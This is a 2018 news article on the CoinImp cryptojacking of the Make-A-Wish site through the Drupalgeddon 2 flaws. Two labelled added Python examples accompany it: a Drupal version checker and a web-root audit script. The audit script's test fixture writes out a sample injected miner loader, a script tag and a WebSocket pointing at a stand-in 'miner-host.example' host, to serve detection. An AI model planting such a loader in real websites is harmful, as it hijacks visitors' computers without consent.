UPDATED 20:50 EST / NOVEMBER 19 2018

SECURITY

Make-A-Wish website cryptojacked with increasingly popular CoinImp script

Proving that some hackers have no morals whatsoever, the website of the Make-A-Wish Foundation has been “cryptojacked”: attackers injected an increasingly popular cryptomining script that puts visitors’ browsers to work mining cryptocurrency for them.

Discovered by Simon Kenin, a security researcher at Trustwave SpiderLabs, and publicized today, the hack involved unknown hackers accessing the Make-A-Wish website through a Drupal vulnerability dubbed Drupalgeddon 2.

A Drupalgeddon 2 attack takes advantage of Drupal installations that have not been patched against CVE-2018-7600 (fixed in Drupal 7.58 and 8.5.1 in March 2018) and the follow-on CVE-2018-7602 (fixed in 7.59 and 8.5.3 in April 2018), two remote code execution vulnerabilities that cryptomining crews were exploiting in the wild by May.
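Whether a site is still exposed is a matter of which release it is running. The following is an added example (not code from Trustwave, Drupal or the article) that reads the version Drupal declares in `includes/bootstrap.inc` (7.x) or `core/lib/Drupal.php` (8.x) and compares it with the first release on each branch that carried the fix, as listed in the Drupal advisories for the two CVEs; the file contents below are constructed samples, and any 8.x branch older than those listed is treated as end-of-life and therefore vulnerable.

```python
"""Report whether a Drupal checkout's declared version predates the fixes for
CVE-2018-7600 (SA-CORE-2018-002) and CVE-2018-7602 (SA-CORE-2018-004).
Added example; not Trustwave's, Drupal's or the article's own code."""
import re

# Constructed samples of the two files in which Drupal declares its version.
SAMPLE_D7_BOOTSTRAP = "<?php\n/**\n * The current system version.\n */\ndefine('VERSION', '7.57');\n"
SAMPLE_D8_DRUPAL_PHP = "<?php\nclass Drupal {\n  const VERSION = '8.5.3';\n"

# Matches both the 7.x define() form and the 8.x class constant form.
VERSION_RE = re.compile(
    r"""(?:define\(\s*['"]VERSION['"]\s*,\s*|const\s+VERSION\s*=\s*)['"]([\d.]+)"""
)

# First release on each supported branch that contains the fix (from the Drupal
# security advisories). Branches newer than these were cut after the fix.
FIXED = {
    "CVE-2018-7600": {(7,): (7, 58), (8, 3): (8, 3, 9), (8, 4): (8, 4, 6), (8, 5): (8, 5, 1)},
    "CVE-2018-7602": {(7,): (7, 59), (8, 4): (8, 4, 8), (8, 5): (8, 5, 3)},
}


def parse_version(source: str) -> tuple:
    """Extract the declared version as a tuple of ints, e.g. (8, 5, 3)."""
    m = VERSION_RE.search(source)
    if not m:
        raise ValueError("no Drupal VERSION declaration found")
    return tuple(int(part) for part in m.group(1).split("."))


def branch(version: tuple) -> tuple:
    """7.x is one branch; 8.x branches are identified by minor version."""
    return (version[0],) if version[0] == 7 else version[:2]


def vulnerable_to(version: tuple) -> list:
    """Return the CVEs the declared version is still exposed to."""
    exposed = []
    for cve, first_fixed in FIXED.items():
        b = branch(version)
        if b in first_fixed:
            if version < first_fixed[b]:
                exposed.append(cve)
        elif b > max(first_fixed):
            continue  # newer branch than any listed: released after the fix
        else:
            exposed.append(cve)  # older, unlisted branch: end-of-life, never patched
    return exposed


def check_source(source: str) -> dict:
    """Convenience wrapper: version declaration text in, findings out."""
    version = parse_version(source)
    return {"version": ".".join(map(str, version)), "vulnerable_to": vulnerable_to(version)}


if __name__ == "__main__":
    for label, src in (("7.x sample", SAMPLE_D7_BOOTSTRAP), ("8.x sample", SAMPLE_D8_DRUPAL_PHP)):
        print(label, check_source(src))
```

Run it against the real file with `check_source(open("includes/bootstrap.inc").read())` or the 8.x equivalent. A version check is only a first pass: a site that was exploited before it was patched stays compromised, so the web root itself still needs to be audited for injected content.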

Although the attack was notable for its target, prompting The Register to ask, “Do they accept Monero in hell?” the more interesting part of the attack was the deployment of an increasingly popular form of cryptomining script.

Called CoinImp, the coin mining script first became available in December 2017 and works in a similar fashion to market leader Coinhive. Users insert a snippet of JavaScript into a website, and the browsers of visitors to that site are put to work mining Monero, or another cryptocurrency called Webchain (webchain.network), for as long as they stay on the page.

CoinImp takes a 1 percent fee on mined cryptocurrency and also offers a referral program that allows script users to sign up others to get a percentage of what their referrals mine.

“What’s interesting about this particular campaign is that it uses different techniques to avoid static detections,” Kenin wrote. “It starts with changing the domain name that hosts the JavaScript miner, which is itself obfuscated…. The WebSocket proxy also uses different domains and IPs which make blacklist solutions obsolete.”

Because the script evades traditional blacklist-based defenses, such as antivirus software and similar products that match on known domains, IP addresses or code signatures, more attacks using it are likely to follow.

“The CoinIMP cryptominer is growing rapidly in popularity and the combination of a well-trafficked charity site paired with the season of giving made this the perfect target for a large-scale cyberattack,” a spokesperson for Trustwave told SiliconANGLE.

Kenin noted that enterprises and other website owners should deploy endpoint protection capable of detecting cryptominers, monitor changes to their websites and audit those changes to make sure they were authorized, and keep their website software up to date with patches.
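The last two recommendations, and Kenin’s point that rotating miner domains make blacklists obsolete, lend themselves to a concrete check. The following is an added example (not code from Trustwave or the article): it records a hash baseline of the served files, reports anything that changed since the baseline, and, for changed pages, flags every external script source or WebSocket endpoint whose host is not on the site’s own allowlist, so a miner loader is caught no matter which domain it is served from. The HTML pages, the allowlist and the `miner-host.example` hostnames are all constructed for the example and are not the indicators from the real incident.

```python
"""Baseline-diff a web root and flag script/WebSocket hosts outside an allowlist.
Added example; not Trustwave's or the article's own code. All inputs below are
constructed, and the miner-host.example names are invented for illustration."""
import hashlib
import re
from urllib.parse import urlparse

# Assumed allowlist: the only hosts this site legitimately loads code from or
# opens sockets to. Maintained by the site owner; an allowlist does not go stale
# when attackers rotate their domains, unlike a blacklist.
ALLOWED_HOSTS = {"www.example.org", "cdn.example.org"}

SCRIPT_SRC_RE = re.compile(r"""<script[^>]*\ssrc\s*=\s*['"]([^'"]+)""", re.I)
WS_URL_RE = re.compile(r"""wss?://[^\s'"()<>]+""", re.I)

# Constructed clean page and the same page with an injected miner loader.
CLEAN_PAGE = """<html><head>
<script src="/core/misc/drupal.js"></script>
<script src="https://cdn.example.org/site.js"></script>
</head><body><h1>Make a wish</h1></body></html>"""

INJECTED_PAGE = CLEAN_PAGE.replace(
    "</head>",
    '<script src="https://static.miner-host.example/lib/miner.js"></script>\n'
    '<script>var m=new WebSocket("wss://ws.miner-host.example/proxy");</script>\n'
    "</head>",
)


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def baseline(files: dict) -> dict:
    """Record path -> SHA-256 for every served file; store this off-host."""
    return {path: sha256_hex(body) for path, body in files.items()}


def diff_against_baseline(base: dict, files: dict) -> tuple:
    """Return (changed_or_new, removed) paths relative to the baseline."""
    changed = sorted(p for p, body in files.items() if sha256_hex(body) != base.get(p))
    removed = sorted(p for p in base if p not in files)
    return changed, removed


def unexpected_endpoints(html: str, allowed_hosts: set) -> list:
    """List (kind, url) for script sources and WebSocket URLs on foreign hosts.

    Relative script paths have no host and are served by the site itself, so
    they are not flagged here (the baseline diff covers tampering with them)."""
    findings = []
    for src in SCRIPT_SRC_RE.findall(html):
        host = urlparse(src).hostname  # None for "/local/path.js"
        if host and host not in allowed_hosts:
            findings.append(("script", src))
    for url in WS_URL_RE.findall(html):
        if urlparse(url).hostname not in allowed_hosts:
            findings.append(("websocket", url))
    return findings


def audit(base: dict, files: dict, allowed_hosts: set) -> dict:
    """Combine both checks: what changed, and whether any change pulls in
    code or sockets from a host the site owner never approved."""
    changed, removed = diff_against_baseline(base, files)
    endpoints = []
    for path in changed:
        if path.endswith((".html", ".htm", ".php", ".js")):
            endpoints.extend(unexpected_endpoints(files[path], allowed_hosts))
    return {"changed": changed, "removed": removed, "endpoints": endpoints}


if __name__ == "__main__":
    before = {"index.html": CLEAN_PAGE, "robots.txt": "User-agent: *\n"}
    after = {"index.html": INJECTED_PAGE, "robots.txt": "User-agent: *\n"}
    print(audit(baseline(before), after, ALLOWED_HOSTS))
```

Every hit in `changed` should map to an authorized deploy; anything else is exactly the unauthorized change Kenin describes. The literal `wss://` match is the weakest part, since an obfuscated miner will hide its proxy address in the script, which is why the allowlist on script hosts, rather than any pattern in the miner code, is what makes the check robust against domain rotation.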

Image: CoinImp
